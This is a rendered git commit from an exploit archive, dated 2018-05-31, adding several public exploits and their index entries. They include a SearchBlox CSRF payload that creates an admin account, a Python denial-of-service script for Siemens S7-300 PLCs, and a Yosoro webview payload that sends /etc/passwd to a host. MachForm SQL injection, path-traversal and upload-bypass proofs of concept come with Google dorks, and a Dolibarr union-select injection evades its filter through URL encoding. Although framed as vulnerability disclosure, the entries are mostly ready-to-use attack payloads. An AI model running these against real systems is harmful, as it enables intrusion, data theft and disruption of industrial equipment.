DB: 2018-05-31
6 changes to exploits/shellcodes Siemens SIMATIC S7-300 CPU - Remote Denial of Service Procps-ng - Multiple Vulnerabilities SearchBlox 8.6.6 - Cross-Site Request Forgery Yosoro 1.0.4 - Remote Code Execution MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass Dolibarr 7.0.0 - SQL Injection
This commit is contained in:
parent
96e4f1686b
commit
89ee92def8
7 changed files with 2579 additions and 0 deletions
48
exploits/java/webapps/44801.txt
Normal file
48
exploits/java/webapps/44801.txt
Normal file
|
@ -0,0 +1,48 @@
|
|||
# Exploit Title: CSRF Privilege Escalation (Creation of an administrator
|
||||
account) on SearchBlox 8.6.6
|
||||
# Exploit Author: Canberk BOLAT, Ahmet GÜREL
|
||||
# Software Link: https://www.searchblox.com/
|
||||
# Version: < = SearchBlox Version 8.6.6
|
||||
# Platform: Java
|
||||
# Tested on: Windows
|
||||
# CVE: CVE-2018-11538
|
||||
|
||||
# 1. DETAILS
|
||||
|
||||
Using Cross-Site Request Forgery (CSRF), an attacker can force a user who
|
||||
is currently authenticated with a web application to execute an unwanted
|
||||
action. The attacker can trick the user into loading a page which may send
|
||||
a request to perform the unwanted action in the background. In the case of
|
||||
Searchblox, we can use CSRF to perform actions on the admin dashboard by
|
||||
targeting an administrator.
|
||||
|
||||
# 2. PoC:
|
||||
|
||||
We assume that Searchblox is installed at http://localhost:8080/. Our
|
||||
target is /searchblox/servlet/UserServlet u_name, u_passwd1, u_passwd2 and
|
||||
role parameter which is the page used to create a new user. The given POC
|
||||
will create a user on the website which has full administrator privileges.
|
||||
|
||||
HTTP Request:
|
||||
|
||||
GET
|
||||
/searchblox/servlet/UserServlet?u_name=best1&u_passwd1=test&u_passwd2=test&role=admin&new-group=&menu1=adm&menu2=db&action=addBuisnessUser
|
||||
HTTP/1.1
|
||||
Host: localhost:8080
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0)
|
||||
Gecko/20100101 Firefox/59.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://localhost:8080/searchblox/admin/main.jsp?menu1=adm
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 0
|
||||
Cookie: JSESSIONID=touluja8tpjc1iiwquoyiigfi;
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
Attack Vector:
|
||||
|
||||
<img src="
|
||||
http://target:8080/searchblox/servlet/UserServlet?u_name=best1&u_passwd1=test&u_passwd2=test&role=admin&new-group=&menu1=adm&menu2=db&action=addBuisnessUser"
|
||||
width="0" height="0">
|
21
exploits/linux/dos/44802.py
Executable file
21
exploits/linux/dos/44802.py
Executable file
|
@ -0,0 +1,21 @@
|
|||
# Exploit Title: Siemens SIMATIC S7-300 CPU - Remote Denial Of Service
|
||||
# Google Dork: inurl:/Portal/Portal.mwsl
|
||||
# Date: 2018-05-30
|
||||
# Exploit Author: t4rkd3vilz
|
||||
# Vendor Homepage: https://www.siemens.com/
|
||||
# Version: SIMATIC S7-300 CPU family: all versions.
|
||||
# Tested on: Kali Linux
|
||||
# CVE: CVE-2015-2177
|
||||
|
||||
#!/usr/bin/python
|
||||
import socket
|
||||
|
||||
target_address="TargetIP"
|
||||
target_port=80
|
||||
|
||||
buffer = "GET " + "\x42" * 2220 + " HTTP/1.1\r\n\r\n"
|
||||
|
||||
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
connect=sock.connect((target_address,target_port))
|
||||
sock.send(buffer)
|
||||
sock.close()
|
2178
exploits/linux/local/44806.txt
Normal file
2178
exploits/linux/local/44806.txt
Normal file
File diff suppressed because it is too large
Load diff
17
exploits/macos/webapps/44803.txt
Normal file
17
exploits/macos/webapps/44803.txt
Normal file
|
@ -0,0 +1,17 @@
|
|||
# Exploit title: Yosoro 1.0.4 - Remote Code Execution
|
||||
# Date: 2018-05-29
|
||||
# Exploit Author: Carlo Pelliccioni
|
||||
# Vendor homepage: https://yosoro.coolecho.net/
|
||||
# Software link: https://github.com/IceEnd/Yosoro/releases/download/v1.0.4/Yosoro-darwin-x64-1.0.4.zip
|
||||
# Version: 1.0.4
|
||||
# Tested on: MacOS 10.13.4
|
||||
# CVE: CVE-2018-11522
|
||||
# _ _ _ _ _ ___ _ _
|
||||
# | || | __ _ __ | |__| |_ (_)__ __ ___ / __| ___ __ _ _ _ _ (_)| |_ _ _
|
||||
# | __ |/ _` |/ _|| / /| _|| |\ V // -_) \__ \/ -_)/ _|| || || '_|| || _|| || |
|
||||
# |_||_|\__,_|\__||_\_\ \__||_| \_/ \___| |___/\___|\__| \_,_||_| |_| \__| \_, |
|
||||
|
||||
# Remote Code Execution (CVE-2018-11522)
|
||||
# Payload:
|
||||
|
||||
<webview src="data:text/html,<script>var read = require('fs').readFileSync('/etc/passwd', 'utf-8'); document.location='http://127.0.0.1:8089/'+btoa(read); </script>" nodeintegration></webview>
|
105
exploits/php/webapps/44804.txt
Normal file
105
exploits/php/webapps/44804.txt
Normal file
|
@ -0,0 +1,105 @@
|
|||
Vendor: Appnitro
|
||||
Product webpage: https://www.machform.com/
|
||||
Full-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/
|
||||
Fix: https://www.machform.com/blog-machform-423-security-release/
|
||||
|
||||
Author: Amine Taouirsa
|
||||
Twitter: @metalamin
|
||||
|
||||
Google dork examples:
|
||||
----------------------
|
||||
"machform" inurl:"view.php"
|
||||
"machform" inurl:"embed.php"
|
||||
|
||||
Summary:
|
||||
---------
|
||||
The form creation platform MachForm from Appnitro is subject to SQL
|
||||
injections that lead to path traversal and arbitrary file upload.
|
||||
|
||||
The application is widely deployed and with some google dorks it’s possible
|
||||
to find various webpages storing sensitive data as credit card numbers with
|
||||
corresponding security codes. Also, the arbitrary file upload can let an
|
||||
attacker get control of the server by uploading a WebShell.
|
||||
|
||||
[1] SQL injection (CVE-2018-6410):
|
||||
-------------------------
|
||||
|
||||
[1.1] Description:
|
||||
The software is subject to SQL injections in the ‘download.php’ file.
|
||||
|
||||
[1.2] Parameters and statement:
|
||||
This SQLi can be found on the parameter ‘q’ which a base64 encoded value
|
||||
for the following parameters:
|
||||
|
||||
$form_id = $params['form_id'];
|
||||
$id = $params['id'];
|
||||
$field_name = $params['el'];
|
||||
$file_hash = $params['hash'];
|
||||
|
||||
|
||||
So the injectable parameters are ‘el’ and ‘form_id’ obtaining error-based,
|
||||
stacked queries and time-based blind SQL injections. This is due to the
|
||||
following vulnerable statement:
|
||||
|
||||
$query = "select {$field_name} from `".MF_TABLE_PREFIX."form_{$form_id}`
|
||||
where id=?";
|
||||
|
||||
|
||||
[1.3] POC
|
||||
Proof of concept to get the first user mail:
|
||||
http:// [URL] / [Machform_folder] /download.php?q=
|
||||
ZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgy
|
||||
MDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3Vz
|
||||
ZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1Io
|
||||
UkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RF
|
||||
Ul9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=
|
||||
|
||||
Which is the base64 encoding for:
|
||||
el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT
|
||||
MID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT
|
||||
0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP
|
||||
BY x)a) ;&id=1&hash=1&form_id=1
|
||||
|
||||
|
||||
[2] Path traversal (CVE-2018-6409):
|
||||
-----------------------------------
|
||||
|
||||
[2.1] Descrition
|
||||
download.php’ is used to serve stored files from the forms answers.
|
||||
Modifying the name of the file to serve on the corresponding ap_form table
|
||||
leads to a path traversal vulnerability.
|
||||
|
||||
[2.2] POC
|
||||
First we need to change the name for the element on the form:
|
||||
update ap_form_58009 set element_4="../../../../../../.
|
||||
./../../../../../../../../../etc/passwd" where id=1;
|
||||
|
||||
Now in order to be able to download it, we need to access:
|
||||
http:// [URL] / [Machform_folder] /download.php?q=
|
||||
ZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0
|
||||
NTgmZm9ybV9pZD01ODAwOQo=
|
||||
|
||||
Which is the base64 encoding for;
|
||||
el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009
|
||||
|
||||
Note that hash is the MD5 of the corresponding filename:
|
||||
md5("../../../../../../../../../../../../../../../../etc/passwd") =
|
||||
402ba0230d6f44a2de590ac11107a458
|
||||
|
||||
[3] Bypass file upload filter (CVE-2018-6411):
|
||||
----------------------------------------------
|
||||
|
||||
When the form is set to filter a blacklist, it automatically add dangerous
|
||||
extensions to the filters.
|
||||
If the filter is set to a whitelist, the dangerous extensions can be
|
||||
bypassed.
|
||||
|
||||
This can be done directly on the database via SQLi
|
||||
update ap_form_elements set element_file_type_list="php",
|
||||
element_file_block_or_allow="a" where form_id=58009 and element_id=4;
|
||||
|
||||
Once uploaded the file can be found and executed in the following URL:
|
||||
http:// [URL] / [Machform_folder] /data/form_58009/files/ [filename]
|
||||
|
||||
The filename can be found in the database
|
||||
SELECT element_4 FROM ap_form_58009 WHERE id=1;
|
204
exploits/php/webapps/44805.txt
Normal file
204
exploits/php/webapps/44805.txt
Normal file
|
@ -0,0 +1,204 @@
|
|||
# [CVE-2018-10094] Dolibarr SQL Injection vulnerability
|
||||
|
||||
|
||||
## Description
|
||||
|
||||
Dolibarr is an "Open Source ERP & CRM for Business" used by many
|
||||
companies worldwide.
|
||||
|
||||
It is available through [GitHub](https://github.com/Dolibarr/dolibarr)
|
||||
or as distribution packages (e.g .deb package).
|
||||
|
||||
**Threat**
|
||||
|
||||
The application does not handle user input properly and allows execution
|
||||
of arbitrary SQL commands on the database.
|
||||
|
||||
**Expectation**
|
||||
|
||||
Prepared queries should be used in order to avoid SQL injection in user
|
||||
input.
|
||||
|
||||
|
||||
## Vulnerability type
|
||||
|
||||
**CVE ID**: CVE-2018-10094
|
||||
|
||||
**Access Vector**: remote
|
||||
|
||||
**Security Risk**: high
|
||||
|
||||
**Vulnerability**: CWE-89
|
||||
|
||||
**CVSS Base Score**: 7.5
|
||||
|
||||
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
|
||||
|
||||
## Details
|
||||
|
||||
The database connector escapes quotes with the `real_escape_string()`
|
||||
wrapper. However it is still possible to perform injection on integer
|
||||
parameters without quotes.
|
||||
|
||||
```php
|
||||
mysqli.class.php
|
||||
|
||||
/**
|
||||
* Escape a string to insert data
|
||||
*
|
||||
* @param string $stringtoencode String to escape
|
||||
* @return string String escaped
|
||||
*/
|
||||
function escape($stringtoencode)
|
||||
{
|
||||
return $this->db->real_escape_string($stringtoencode);
|
||||
}
|
||||
```
|
||||
|
||||
Additional checks are defined later, which forbit some SQL keywords (e.g
|
||||
`union`, `create`, `insert`). However, by url encoding the payload,
|
||||
these checks are bypassed.
|
||||
|
||||
```php
|
||||
main.inc.php
|
||||
|
||||
/**
|
||||
* Security: SQL Injection and XSS Injection (scripts) protection
|
||||
(Filters on GET, POST, PHP_SELF).
|
||||
*
|
||||
* @param string $val Value
|
||||
* @param string $type 1=GET, 0=POST, 2=PHP_SELF
|
||||
* @return int >0 if there is an injection
|
||||
*/
|
||||
function test_sql_and_script_inject($val, $type)
|
||||
{
|
||||
$inj = 0;
|
||||
// For SQL Injection (only GET are used to be included into bad
|
||||
escaped SQL requests)
|
||||
if ($type == 1)
|
||||
{
|
||||
$inj += preg_match('/updatexml\(/i', $val);
|
||||
$inj += preg_match('/delete\s+from/i', $val);
|
||||
$inj += preg_match('/create\s+table/i', $val);
|
||||
$inj += preg_match('/insert\s+into/i', $val);
|
||||
$inj += preg_match('/select\s+from/i', $val);
|
||||
$inj += preg_match('/into\s+(outfile|dumpfile)/i', $val);
|
||||
}
|
||||
if ($type != 2) // Not common, we can check on POST
|
||||
{
|
||||
$inj += preg_match('/update.+set.+=/i', $val);
|
||||
$inj += preg_match('/union.+select/i', $val);
|
||||
$inj += preg_match('/(\.\.%2f)+/i', $val);
|
||||
}
|
||||
// For XSS Injection done by adding javascript with script
|
||||
// This is all cases a browser consider text is javascript:
|
||||
// When it found '<script', 'javascript:', '<style', 'onload\s=' on
|
||||
body tag, '="&' on a tag size with old browsers
|
||||
// All examples on page: http://ha.ckers.org/xss.html#XSScalc
|
||||
// More on
|
||||
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
|
||||
$inj += preg_match('/<script/i', $val);
|
||||
$inj += preg_match('/<iframe/i', $val);
|
||||
$inj += preg_match('/Set\.constructor/i', $val); // ECMA script 6
|
||||
if (! defined('NOSTYLECHECK')) $inj += preg_match('/<style/i', $val);
|
||||
$inj += preg_match('/base[\s]+href/si', $val);
|
||||
$inj += preg_match('/<.*onmouse/si', $val); // onmousexxx can
|
||||
be set on img or any html tag like <img title='...' onmouseover=alert(1)>
|
||||
$inj += preg_match('/onerror\s*=/i', $val); // onerror can be
|
||||
set on img or any html tag like <img title='...' onerror = alert(1)>
|
||||
$inj += preg_match('/onfocus\s*=/i', $val); // onfocus can be
|
||||
set on input text html tag like <input type='text' value='...' onfocus =
|
||||
alert(1)>
|
||||
$inj += preg_match('/onload\s*=/i', $val); // onload can be
|
||||
set on svg tag <svg/onload=alert(1)> or other tag like body <body
|
||||
onload=alert(1)>
|
||||
$inj += preg_match('/onclick\s*=/i', $val); // onclick can be
|
||||
set on img text html tag like <img onclick = alert(1)>
|
||||
$inj += preg_match('/onscroll\s*=/i', $val); // onscroll can be
|
||||
on textarea
|
||||
//$inj += preg_match('/on[A-Z][a-z]+\*=/', $val); // To lock event
|
||||
handlers onAbort(), ...
|
||||
$inj += preg_match('/:|:|:/i', $val); //
|
||||
refused string ':' encoded (no reason to have it encoded) to lock
|
||||
'javascript:...'
|
||||
//if ($type == 1)
|
||||
//{
|
||||
$inj += preg_match('/javascript:/i', $val);
|
||||
$inj += preg_match('/vbscript:/i', $val);
|
||||
//}
|
||||
// For XSS Injection done by adding javascript closing html tags
|
||||
like with onmousemove, etc... (closing a src or href tag with not
|
||||
cleaned param)
|
||||
if ($type == 1) $inj += preg_match('/"/i', $val); // We
|
||||
refused " in GET parameters value
|
||||
if ($type == 2) $inj += preg_match('/[;"]/', $val); // PHP_SELF
|
||||
is a file system path. It can contains spaces.
|
||||
return $inj;
|
||||
}
|
||||
```
|
||||
|
||||
## Proof of Concept : retrieving the database name.
|
||||
|
||||
Payload:
|
||||
|
||||
```
|
||||
1) union select
|
||||
0,1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
|
||||
|
||||
Url-encoded payload:
|
||||
%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%32%2c%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%23
|
||||
```
|
||||
|
||||
```http
|
||||
GET
|
||||
/dolibarr/adherents/list.php?leftmenu=members&statut=%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%32%2c%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%23
|
||||
HTTP/1.1
|
||||
Host: dolibarr.lab:2080
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
|
||||
Firefox/52.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie:
|
||||
DOLSESSID_cac4a1e49e4040e845340fe919bd202b=qh3ot46kvm95ph0ddd3ujd7je5
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
...
|
||||
|
||||
</a>
|
||||
</td>
|
||||
<td>10.1.26-MariaDB-0+deb9u1</td>
|
||||
<td>2</td>
|
||||
<td></td>
|
||||
<td>1</td>
|
||||
<td>21</td>
|
||||
<td class="nowrap">
|
||||
```
|
||||
|
||||
|
||||
## Affected versions
|
||||
|
||||
* Version 7.0.0 (last stable version as of March 2018) - previous
|
||||
versions are probably also vulnerable but not tested
|
||||
|
||||
## Solution
|
||||
|
||||
Update to 7.0.2
|
||||
([changelog](https://raw.githubusercontent.com/Dolibarr/dolibarr/develop/ChangeLog))
|
||||
|
||||
## Timeline (dd/mm/yyyy)
|
||||
|
||||
* 18/03/2018 : Initial discovery
|
||||
* 17/04/2018 : Contact with the editor
|
||||
* 17/04/2018 : Editor acknowledges the vulnerability
|
||||
* 18/04/2018 : Editor announces fixes in version 7.0.2
|
||||
* 21/05/2018 : Vulnerability disclosure
|
||||
|
||||
## Credits
|
||||
|
||||
* Issam RABHI (i dot rabhi at sysdream dot com)
|
||||
* Kevin LOCATI (k dot locati at sysdream dot com)
|
||||
|
||||
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream
|
|
@ -5983,6 +5983,7 @@ id,file,description,date,author,type,platform,port
|
|||
44758,exploits/windows/dos/44758.html,"Microsoft Edge Chakra - Cross Context Use-After-Free",2018-05-25,"Google Security Research",dos,windows,
|
||||
44759,exploits/multiple/dos/44759.html,"Skia and Firefox - Integer Overflow in SkTDArray Leading to Out-of-Bounds Write",2018-05-25,"Google Security Research",dos,multiple,
|
||||
44768,exploits/php/dos/44768.txt,"Symfony 2.7.0 < 4.0.10 - Denial of Service",2018-05-26,"Federico Stange",dos,php,
|
||||
44802,exploits/linux/dos/44802.py,"Siemens SIMATIC S7-300 CPU - Remote Denial of Service",2018-05-30,t4rkd3vilz,dos,linux,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -9748,6 +9749,7 @@ id,file,description,date,author,type,platform,port
|
|||
44787,exploits/windows_x86/local/44787.py,"ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)",2018-05-28,"Gokul Babu",local,windows_x86,
|
||||
44797,exploits/linux/local/44797.txt,"GNU Barcode 0.99 - Buffer Overflow",2018-05-29,LiquidWorm,local,linux,
|
||||
44798,exploits/linux/local/44798.txt,"GNU Barcode 0.99 - Memory Leak",2018-05-29,LiquidWorm,local,linux,
|
||||
44806,exploits/linux/local/44806.txt,"Procps-ng - Multiple Vulnerabilities",2018-05-30,"Qualys Corporation",local,linux,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -39470,3 +39472,7 @@ id,file,description,date,author,type,platform,port
|
|||
44796,exploits/java/webapps/44796.txt,"Pivotal Spring Java Framework < 5.0 - Remote Code Execution",2018-05-29,JameelNabbo,webapps,java,
|
||||
44799,exploits/php/webapps/44799.txt,"Facebook Clone Script 1.0.5 - 'search' SQL Injection",2018-05-29,L0RD,webapps,php,
|
||||
44800,exploits/php/webapps/44800.txt,"Facebook Clone Script 1.0.5 - Cross-Site Request Forgery",2018-05-29,L0RD,webapps,php,
|
||||
44801,exploits/java/webapps/44801.txt,"SearchBlox 8.6.6 - Cross-Site Request Forgery",2018-05-30,"Ahmet Gurel",webapps,java,
|
||||
44803,exploits/macos/webapps/44803.txt,"Yosoro 1.0.4 - Remote Code Execution",2018-05-30,"Carlo Pelliccioni",webapps,macos,
|
||||
44804,exploits/php/webapps/44804.txt,"MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass",2018-05-30,"Amine Taouirsa",webapps,php,80
|
||||
44805,exploits/php/webapps/44805.txt,"Dolibarr 7.0.0 - SQL Injection",2018-05-30,Sysdream,webapps,php,80
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue